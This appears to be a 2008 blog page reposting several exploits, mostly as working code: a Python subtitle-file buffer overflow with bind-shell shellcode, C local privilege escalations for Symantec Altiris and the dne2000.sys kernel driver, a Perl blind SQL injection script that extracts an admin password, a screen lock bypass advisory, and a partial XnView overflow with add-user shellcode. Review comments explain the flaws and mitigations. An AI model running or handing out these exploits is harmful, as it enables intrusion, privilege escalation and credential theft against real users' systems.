Wednesday, July 30, 2008

Kantaris 0.3.4 SSA Subtitle Local Buffer Overflow Exploit

###################################
#Kantaris 0.3.4 SSA Subtitle Local Buffer Overflow Exploit
###################################

#!/usr/bin/python
#
# Kantaris 0.3.4 Media Player Local Buffer Overflow [0day!]
#
# The following exploit will make a film.ssa file,
# just rename the file with the name of your movie, and use your imagination

# to pwn! :)
# Shellcode is local bind shell, just telnet to port:4444 to get command prompt :)
#
# BIG thanks to muts for helping
# and discovering a very interesting thing that we will publish soon

#
# I piss on your Business Networks course Igor Radusinovic! Go to hell!
#
# Vulnerability discovered by Muris Kurgas a.k.a. j0rgan
# jorganwd [at] gmail [dot] com
# http://www.jorgan.users.cg.yu


import os

# Return-address overwrite. The author's comment calls it a "JMP ESP" gadget for Windows XP SP1;
# the four raw bytes are presumably the address 0x77FB59CC in little-endian order (taken as given).
jmp = '\xCC\x59\xFB\x77' # Windows XP sp1 JMP ESP, u can change it...

# Payload blob as provided on the page. The metadata line below gives size 709 and a bind
# shell on TCP 4444; "PexAlphaNum" suggests an alphanumeric encoder, consistent with the
# mostly 0x41-0x5a bytes. Kept verbatim.
# Defender note: the observable effect the author describes is the media player opening a
# listening socket on port 4444 after parsing the subtitle file.
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
sc=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"

"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"

"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x43\x4b\x48\x4e\x37"

"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x38"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x48"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"

"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"

"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48"
"\x49\x38\x4e\x36\x46\x42\x4e\x51\x41\x46\x43\x4c\x41\x33\x4b\x4d"
"\x46\x56\x4b\x58\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x50\x4b\x38"

"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x50\x50\x35\x4a\x36"
"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
"\x43\x35\x48\x56\x4a\x56\x43\x53\x44\x53\x4a\x36\x47\x37\x43\x57"

"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e"
"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50"

"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x51"

"\x4e\x55\x48\x46\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x31"
"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52"

"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x45\x4f\x4f\x48\x4d"
"\x42\x45\x46\x55\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46"

"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x56\x48\x46\x4a\x36\x43\x36"
"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x42\x4e\x4c"

"\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42"
"\x43\x49\x4d\x48\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"

"\x44\x57\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x54\x4f\x4f"
"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x55\x41\x55\x41\x35\x4c\x46"
"\x41\x30\x41\x35\x41\x55\x45\x55\x41\x35\x4f\x4f\x42\x4d\x4a\x46"

"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"

"\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")

# Overflow buffer: 163868 filler bytes, the return-address bytes, a 32-byte NOP sled, then the
# payload (offset and address as given on the page).
bafer = '\x41' * 163868 + jmp + "\x90" * 32 + sc

# Output is a minimal SSA script; the header sections are just enough for a parser to reach
# [Events]. Opened in text mode with byte-string literals (the shebang suggests Python 2).
fileHandle = open ( 'film.ssa', 'w' )

fileHandle.write ( '[Script Info]\n')
fileHandle.write ( 'ScriptType: v4.00\n')
fileHandle.write ( 'Title: Kantaris 0.3.4 buffer-overflow\n')
fileHandle.write ( 'Collisions: Normal\n\n')

fileHandle.write ( '[V4 Styles]\n\n')
fileHandle.write ( '[Events]\n')

# The oversized "Dialogue:" event is the trigger named in the title; a robust SSA parser must
# bound the event text it copies into a fixed buffer.
fileHandle.write ( 'Dialogue: '+ bafer)
fileHandle.close()

Symantec Altiris Client Service 6.8.378 Local Privilege Escalation Exp

###################################
#Symantec Altiris Client Service 6.8.378 Local Privilege Escalation Exp
###################################

// 0day PRIVATE NOT DISTRIBUTE!!!
//
// Symantec Altiris Client Service Local Exploit (0day)
//
// Affected Versions : Altiris Client 6.5.248
// Altiris Client 6.5.299
// Altiris client 6.8.378
//
// Alex Hernandez aka alt3kx
// ahernandez [at] sybsecurity.com
//
// Eduardo Vela aka sirdarckcat
// sirdarckcat [at] gmail.com
//
// We'll see you soon at ph-neutral 0x7d8

#include "stdio.h"
#include "windows.h"

// Entry point. Drives the "Altiris Client Service" window with synthetic window messages
// until a Windows Help window and then a file dialog appear, and steers that dialog towards
// cmd.exe. The banner credits the MS04-019 Utility Manager exploit as the model, so the
// weakness class is presumably a privileged process exposing interactive-desktop UI to an
// unprivileged user (shatter-style) -- TODO confirm against the vendor advisory.
// Defensive takeaway: services must not own windows on the interactive desktop; session 0
// isolation and UIPI on later Windows versions mitigate this class.
int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
int id,a=0;
// 255 slots indexed by primary LANGID; only 0x09 (English), 0x0a (Spanish) and 0x0c (French)
// are populated below. Each slot is a 255-byte string.
char langH[255][255];
char langO[255][255];
char wname[]="Altiris Client Service";

// Help-window titles per language.
strcpy(langH[0x0c],"Aide de Windows");
strcpy(langH[0x09],"Windows Help");
strcpy(langH[0x0a],"Ayuda de Windows");

// Caption of the file dialog per language.
strcpy(langO[0x0c],"Ouvrir");
strcpy(langO[0x09],"Open");
strcpy(langO[0x0a],"Abrir");

printf("##########################################################\n");
printf("# Altiris Client Service #\n");
printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit #\n");
printf("# by sirdarckcat & alt3kx #\n");
printf("# #\n");
printf("# This exploit is based on www.milw0rm.com/exploits/350 #\n");
printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n");
printf("# by Cesar Cerrudo #\n");
printf("##########################################################\n\n");

// NOTE(review): the English fallback fires only when the system LANGID is 0 AND the user
// LANGID is non-zero, and it then discards the user value just fetched; when both are 0,
// id stays 0 and indexes an empty slot below.
id=PRIMARYLANGID(GetSystemDefaultLangID());
if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){
printf("Lang not found, using english\n");
id=9;
}

// Text later pushed into the dialog's edit control via WM_SETTEXT (see below).
char sText[]="%windir%\\system32\\cmd.ex?";

if (argc<2){
printf("Use:\n> %s [LANG-ID]\n\n",argv[0]);
printf("Look for your LANG-ID here:\n");
printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n");
printf("\nAnyway, the program will try to guess it.\n\n");
return 0;
}else{
if (argc==2){
// NOTE(review): langH[n] is an array and therefore never compares false, so the "not
// supported" branch is unreachable; atoi(argv[1]) is also not range-checked against the
// 255 slots, so a large value indexes out of bounds.
if (langH[atoi(argv[1])]){
id=atoi(argv[1]);
printf("Lang changed\n");
}else{
// NOTE(review): stray 'id' argument with no matching conversion in the format string.
printf("Lang not supported\n",id);
}
}
}
printf("Using Lang %d\n",id);
printf("Looking for %s..\n",wname);
lHandle=FindWindow(NULL, wname);
if (!lHandle) {
printf("Window %s not found\n", wname);
return 0;
}else{
printf("Found! exploiting..\n");
}
// Raw message numbers (0x313, 0x365) and dialog control ids (0x47C, 0x4A0 further down)
// are taken as given on the page; they are not documented Win32 constants.
PostMessage(lHandle,0x313,NULL,NULL);

Sleep(100);

SendMessage(lHandle,0x365,NULL,0x1);
Sleep(300);
// The fixed Sleep() delays let the UI settle; the whole sequence is timing-dependent.
pp:
// Expect the Help window (title per language); retry once with English before giving up.
if (!FindWindow(NULL, langH[id])){
printf("Help Window not found.. exploit unsuccesful\n");
if (id!=9){
printf("Trying with english..\n");
id=9;
goto pp;
}else{
return 0;
}
}else{
printf("Help Window found! exploiting..\n");
}
// Keystrokes are synthesized with WM_IME_KEYDOWN rather than real input.
SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0);
Sleep(500);
// "#32770" is the standard dialog window class; the caption is the per-language "Open".
lHandle = FindWindow("#32770",langO[id]);
lHandle2 = GetDlgItem(lHandle, 0x47C);
Sleep(500);
printf("Sending path..\n");
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
Sleep(800);
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
lHandle2 = GetDlgItem(lHandle, 0x4A0);
printf("Looking for cmd..\n");
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
Sleep(500);
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
lHandle2 = GetDlgItem(lHandle2, 0x1);
printf("Sending keys..\n");
// 0x43, 0x4D, 0x44 are the virtual-key codes for 'C', 'M', 'D'.
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);
Sleep(500);
mark:
// Open the context menu at a fixed screen point and navigate it with two VK_DOWN + VK_RETURN;
// the block from here to the success check is retried once (a is the retry counter).
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
Sleep(1000);
point.x =10; point.y =30;
lHandle2=WindowFromPoint(point);
Sleep(1000);
printf("Opening shell..\n");
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
Sleep(1000);
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
Sleep(1000);
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);
Sleep(1000);
// Success check: a cmd.exe console window under either of the two common system roots.
if (!FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe") && !FindWindow(NULL,"C:\\WINNT\\system32\\cmd.exe")){
printf("Failed\n");
if (!a){
a++;
goto mark;
}
}else{
printf("Done!\n");
}
// Cleanup runs only when no retry happened (a==0): close the dialog, the help window and any
// window titled like argv[1] (the last call looks like a leftover).
// NOTE(review): a success on the retry pass (a==1) still falls into the failure message.
if(!a){
SendMessage (lHandle, WM_CLOSE,0,0);
Sleep(500);
SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);
SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);
}else{
printf("The exploit failed, but maybe the context window of the shell is visibile.\n");
}
return 0;
}

Deterministic Network Enhancer dne2000.sys kernel ring0 SYSTEM exploit

###################################
#Deterministic Network Enhancer dne2000.sys kernel ring0 SYSTEM exploit
###################################

/* dne2000-call.c
*
* Copyright (c) 2008 by
*
* Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit
* by mu-b - Sun 06 Jan 2008
*
* - Tested on: dne2000.sys 2.21.7.233 <-> 3.21.7.17464
* bundled with: SafeNET HighAssurance Remote, SoftRemote
* Cisco VPN Client
* Winproxy
*
* Compile: MinGW + -lntdll
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/

#include
#include

#include
#include

/* IOCTL code sent to the DNE device via DeviceIoControl (see main). */
#define DNE_IOCTL 0x00222008
/* Marker values placed in the request, item and function records below; presumably what the
 * driver checks before following the embedded pointers (inferred from the struct layout). */
#define DNE_FLAG 0x00001005

#define ITEM_FLAG_1 0x4A424F4E
#define ITEM_FLAG_2 0x47554C50
#define FUNC_FLAG 0x00010003

/* Prologue placed before the payload: push esi (preserved and restored by win32_ret). */
static unsigned char win32_fixup[] =
"\x56";

/* Ring-0 payload for Server 2003 field offsets. Per the author's labels it walks the process
 * list to find PID 4 (System) and then the target PID, and copies the token field between
 * them. The four zero bytes in the second compare are the PID placeholder that
 * fixup_ring0_shell() overwrites at offset 58. Kept as given. */
static unsigned char win2k3_ring0_shell[] =
/* _ring0 */
"\xb8\x24\xf1\xdf\xff"
"\x8b\x00"
"\x8b\xb0\x18\x02\x00\x00"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\x9c\x00\x00\x00"
"\x2d\x98\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"

/* _cmd_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\x9c\x00\x00\x00"
"\x2d\x98\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */

/* copy tokens!$%! */
"\x8b\x89\xd8\x00\x00\x00"
"\x89\x88\xd8\x00\x00\x00"
"\x90";

/* Same payload with Windows XP field offsets; the PID placeholder is at offset 55 here
 * because the third instruction is three bytes shorter. Kept as given. */
static unsigned char winxp_ring0_shell[] =
/* _ring0 */
"\xb8\x24\xf1\xdf\xff"
"\x8b\x00"
"\x8b\x70\x44"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x84\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\x8c\x00\x00\x00"
"\x2d\x88\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"

/* _cmd_eprocess_loop */
"\x8b\x98\x84\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\x8c\x00\x00\x00"
"\x2d\x88\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */

/* copy tokens!$%! */
"\x8b\x89\xc8\x00\x00\x00"
"\x89\x88\xc8\x00\x00\x00"
"\x90";

/* Epilogue: pop esi; ret 0x10 -- returns to the driver with a 16-byte stack cleanup,
 * presumably matching the calling convention of the hijacked function pointer. */
static unsigned char win32_ret[] =
"\x5e"
"\xc2\x10\x00";

/* Record layouts mirroring what the driver dereferences; the padding sizes are as given on
 * the page. The chain built in main() is req.ptr[1] -> items[0] -> items[1] -> funcs ->
 * func_ptr, the last being user-mode memory the driver ends up calling. */
struct ioctl_func {
char _pad[0x04];
int flag;
char __pad[0x2C];
void *func_ptr;
};

struct ioctl_item {
int flag;
char _pad[0x24];
struct ioctl_func *item_func;
struct ioctl_item *item_ptr;
};

struct ioctl_req {
int req_num;
struct ioctl_item *ptr[2];
};

/* Pick the ring-0 payload matching the running OS (5.1 = XP, 5.2 = Server 2003), patch the
 * caller's PID into its placeholder dword, and return a pointer to the (static, now
 * modified) array with its length in *zlen. Any other GetVersion() result terminates the
 * process; the trailing return(NULL) is unreachable.
 * Offsets 55 / 58 are the position of the zero dword in the second compare of each payload;
 * they differ because the third instruction is 3 bytes on XP and 6 bytes on 2003. */
static PCHAR
fixup_ring0_shell (DWORD ppid, DWORD *zlen)
{
DWORD dwVersion, dwMajorVersion, dwMinorVersion;

/* Major version in the low byte, minor in the next byte of the low word. */
dwVersion = GetVersion ();
dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));

if (dwMajorVersion != 5)
{
fprintf (stderr, "* GetVersion, unsupported version\n");
exit (EXIT_FAILURE);
}

switch (dwMinorVersion)
{
case 1:
/* sizeof includes the string's NUL; -1 drops it. */
*zlen = sizeof winxp_ring0_shell - 1;
*(PDWORD) &winxp_ring0_shell[55] = ppid;
return (winxp_ring0_shell);

case 2:
*zlen = sizeof win2k3_ring0_shell - 1;
*(PDWORD) &win2k3_ring0_shell[58] = ppid;
return (win2k3_ring0_shell);

default:
fprintf (stderr, "* GetVersion, unsupported version\n");
exit (EXIT_FAILURE);
}

return (NULL);
}

/* Entry point. Opens the DNE device, stages a user-mode page holding prologue + ring-0
 * payload + epilogue, and issues the IOCTL with a request whose nested pointers lead to that
 * page. argv[1] is presumably the PID of the process whose token is to be replaced (it is
 * passed into the payload by fixup_ring0_shell()).
 * The weakness class this relies on is a kernel driver following and calling through
 * user-supplied pointers without validation (inferred from the request layout -- TODO
 * confirm). Defensive notes: the vendor driver update is the fix; on later platforms SMEP
 * blocks ring-0 execution of user-mode pages, which this code depends on. */
int
main (int argc, char **argv)
{
struct ioctl_req req;
struct ioctl_item items[2];
struct ioctl_func funcs;
LPVOID zpage, zbuf;
DWORD rlen, zlen, ppid;
HANDLE hFile;
BOOL result;

printf ("Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit\n"
"by: \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

/* NOTE(review): the usage string appears to have lost its argument name in extraction. */
if (argc <= 1)
{
fprintf (stderr, "Usage: %s \n", argv[0]);
exit (EXIT_SUCCESS);
}

ppid = atoi (argv[1]);

/* Only FILE_EXECUTE access is requested; the device apparently grants this to unprivileged
 * users, which is what makes the escalation local-user reachable (hedged). */
hFile = CreateFileA ("\\\\.\\DNE", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
/* NOTE(review): prints the handle value rather than GetLastError(). */
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}

/* 64 KiB RWX page, pre-filled with int3 so a stray jump traps instead of running garbage. */
zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
/* %08X on a pointer assumes a 32-bit build. */
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x10000);

memset (zpage, 0xCC, 0x10000);
zbuf = fixup_ring0_shell (ppid, &zlen);
/* Layout: win32_fixup | payload | win32_ret. Arithmetic on LPVOID (void*) is a GCC
 * extension, consistent with the MinGW build noted in the header. */
memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
win32_ret, sizeof (win32_ret) - 1);

/* Build the linked request: req.ptr[1] -> items[0] -> items[1] -> funcs -> zpage. */
memset (&req, 0, sizeof req);
req.req_num = DNE_FLAG;
req.ptr[0] = NULL;
req.ptr[1] = &items[0];

memset (items, 0, sizeof items);
items[0].flag = ITEM_FLAG_1;
items[0].item_ptr = &items[1];

items[1].flag = ITEM_FLAG_2;
items[1].item_func = &funcs;

memset (&funcs, 0, sizeof funcs);
funcs.flag = FUNC_FLAG;
funcs.func_ptr = zpage;

printf ("* req.ptr: 0x%08X\n", &items[0]);
printf ("* @0x%08X: flag: 0x%08X, item_ptr: 0x%08X\n",
&items[0], items[0].flag, items[0].item_ptr);
printf ("* @0x%08X: flag: 0x%08X, item_func: 0x%08X\n",
items[0].item_ptr, items[1].flag, items[1].item_func);
printf ("* @0x%08X: flag: 0x%08X, func_ptr: 0x%08X\n",
items[1].item_func, funcs.flag, funcs.func_ptr);

/* jump to our address :) */
/* The same struct is used as both input and output buffer. */
printf ("* jumping.. ");
result = DeviceIoControl (hFile, DNE_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!result)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
/* The author's message implies a bugcheck is the expected failure mode of this IOCTL. */
printf ("done\n\n"
"* hmmm, you didn't STOP the box?!?!\n");

CloseHandle (hFile);

return (EXIT_SUCCESS);
}

screen 4.0.3 Local Authentication Bypass Vulnerability (OpenBSD)

###################################
#screen 4.0.3 Local Authentication Bypass Vulnerability (OpenBSD)
###################################

_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
--------------------------------------------------------------------------------

Author: Rembrandt
Date : Known since somewhere in &cant_remember (some years, really..)
Affected Software: screen <= 4.0.3
Affected OS : OpenBSD (any up to current (which will become oBSD 4.4))
Type: Local
Type: Authentication Bypass

Greets go to: Helith and all affiliated/loyal people


I did not find an advisory related to this, so I decided to write a leet one.

screen is vulnerable to an authentication bypass which allows local attackers
to gain system access in case screen was locked with a password.

It has been tested on OpenBSD + screen 4.0.3 on x86/amd64.
But given the nature of the behavior of screen and OpenBSD, it should be
architecture/version independent for now.


How to check this?

Lock screen using ctrl+x
Choose a Password
Confirm the Password

Screen asks for a Password to unlock the screen.
Just press ctrl+c and if you like screen-x to reattach the screen-session.

Example:

$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt .
Password:
$ screen -x
There are several suitable screens on:
29602.ttyC0.raven (Attached)
25144.ttyC1.raven (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$

Because of the nature of a locked screen you won't be able to lock your shell.
screen will never ask you for a password.

Of course this also works if you get access to an SSH session which has a locked
screen running. So in case you have locked your screen session which contains
an open SSH session to a host where you also have a locked screen session,
you might have no password protection at all in case all systems are OpenBSD.
That is just another example. Important for you should be the combination of
screen and OpenBSD.

Do not claim it does not work because you just tested this against the latest
Linux/Solaris/Whatever.

It is known to work and I mentioned the OS.
Still it is known that it worked against some scary Linux distributions
which are not really common.

All security websites which report this as a fake may consider updating their
reports instead of simply claiming wrong things.

Have fun!

Scientific Image DataBase <= 0.41 Blind SQL Injection Exploit

###################################
#Scientific Image DataBase <= 0.41 Blind SQL Injection Exploit
###################################

#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;

# Download: http://sidb.sourceforge.net/
# Dork: "Scientific Image DataBase"
# This exploit retrieves the admin username/password via blind mysql injection.


# NOTE(review): the heredoc opener on the next line and the STDIN read further down look
# garbled by extraction (likely `print <<INFO;` and `chomp(my $url=<STDIN>);`); left as found.
print <-------------------------------------
- Scientific Image DataBase <= 0.41 -
- Blind SQL Injection Exploit -
- -
- Coded && Discovered By: t0pP8uZz -
- Discovered On: 19 JUNE 2008 -
-------------------------------------
-Greetz: muts, perlunderground, h-y -
- cipher, milw0rm -
-------------------------------------

INFO

print "Enter URL(ie: http://site.com): ";
chomp(my $url=);

# Inference state: 1-based character position, loop flag, candidate byte value (starts at
# '0' = 48) and the recovered string.
my ($substr, $done, $chr, $res) = (1, 1, 48, "");

# Browser-like User-Agent plus an in-memory cookie jar; the guest login only establishes a
# session so the injected page is reachable.
my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} );
$ua->post($url."/login.php", { 'logon' => 'true', 'user' => 'guest', 'pwd' => 'guest', 'submit' => 'Login' } );

# Boolean-based blind injection on the "id" parameter of projects.php: one request per
# (position, candidate byte); a response without "Not meant" means the candidate matched.
# Stops once 32 characters are recovered (apparently an MD5-sized value -- TODO confirm).
# Detection angle: a burst of requests differing only in the ascii(substring(...)) arguments.
# Mitigation: parameterised queries and integer validation of "id" on the server side.
while($done) {
my $content = $ua->get($url."/projects.php?show=true&id=57%20and%20ascii(substring((select%20pwd%20from%20users%20where%20userid=1),".$substr.",1))=".$chr);

if($content->content =~ /Not meant/ && length($res) == 32) { $done = 0; }
elsif($content->content !~ /Not meant/) { $res .= chr($chr); $substr++; $chr = 48; }
else { $chr++; }
}
# The username is hard-coded in the output; only the pwd column value is actually recovered.
print "Username: sysadmin Password: ".$res."\n";
exit;

XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit

###################################
#XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit
###################################

#include
#include
/*
XnView 1.93.6 for Windows .taac buffer overflow proof of concept.

The vulnerability is caused due to a boundary error when processing
the "format" keyword of Sun TAAC files. This can be exploited to
cause a stack-based buffer overflow by e.g. tricking a user into
viewing a specially crafted Sun TAAC file.

Vulnerability discovered by Secunia research http://secunia.com/secunia_research/2008-24/advisory/

Exploit code by Shinnok raydenxy@yahoo.com
http://www.rstcenter.com

This poc will create a "special" .taac file that when opened or viewed in XnView 1.93.6 for Windows
will cause a buffer overflow and add an user "test" with password "test".
Tested on Windows XP sp2&sp3.

greetz to escalation666
*/

/* win32_adduser - PASS=test EXITFUNC=seh USER=test Size=232 Encoder=PexFnstenvSub http://metasploit.com */
/* Author-supplied payload blob; the comment above describes it as adding a local user.
 * Passed through %s in main(), so it must contain no embedded NUL. Kept as given. */
unsigned char scode[] =
"\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbf"
"\x93\x8f\x1e\x83\xeb\xfc\xe2\xf4\x43\x7b\xcb\x1e\xbf\x93\x04\x5b"
"\x83\x18\xf3\x1b\xc7\x92\x60\x95\xf0\x8b\x04\x41\x9f\x92\x64\x57"
"\x34\xa7\x04\x1f\x51\xa2\x4f\x87\x13\x17\x4f\x6a\xb8\x52\x45\x13"
"\xbe\x51\x64\xea\x84\xc7\xab\x1a\xca\x76\x04\x41\x9b\x92\x64\x78"
"\x34\x9f\xc4\x95\xe0\x8f\x8e\xf5\x34\x8f\x04\x1f\x54\x1a\xd3\x3a"
"\xbb\x50\xbe\xde\xdb\x18\xcf\x2e\x3a\x53\xf7\x12\x34\xd3\x83\x95"
"\xcf\x8f\x22\x95\xd7\x9b\x64\x17\x34\x13\x3f\x1e\xbf\x93\x04\x76"
"\x83\xcc\xbe\xe8\xdf\xc5\x06\xe6\x3c\x53\xf4\x4e\xd7\x63\x05\x1a"
"\xe0\xfb\x17\xe0\x35\x9d\xd8\xe1\x58\xf0\xe2\x7a\x91\xf6\xf7\x7b"
"\x9f\xbc\xec\x3e\xd1\xf6\xfb\x3e\xca\xe0\xea\x6c\x9f\xe7\xea\x6d"
"\xcb\xb3\xfb\x7b\xcc\xe7\xaf\x31\xfe\xd7\xcb\x3e\x99\xb5\xaf\x70"
"\xda\xe7\xaf\x72\xd0\xf0\xee\x72\xd8\xe1\xe0\x6b\xcf\xb3\xce\x7a"
"\xd2\xfa\xe1\x77\xcc\xe7\xfd\x7f\xcb\xfc\xfd\x6d\x9f\xe7\xea\x6d"
"\xcb\xb3\xa0\x5f\xfb\xd7\x8f\x1e";


/* Return-address bytes for XP SP2 / SP3 as given on the page (raw, presumably little-endian). */
unsigned char ra_sp2[] = "\xed\x1e\x94\x7c";
unsigned char ra_sp3[] = "\x83\xbf\x8a\x5b";

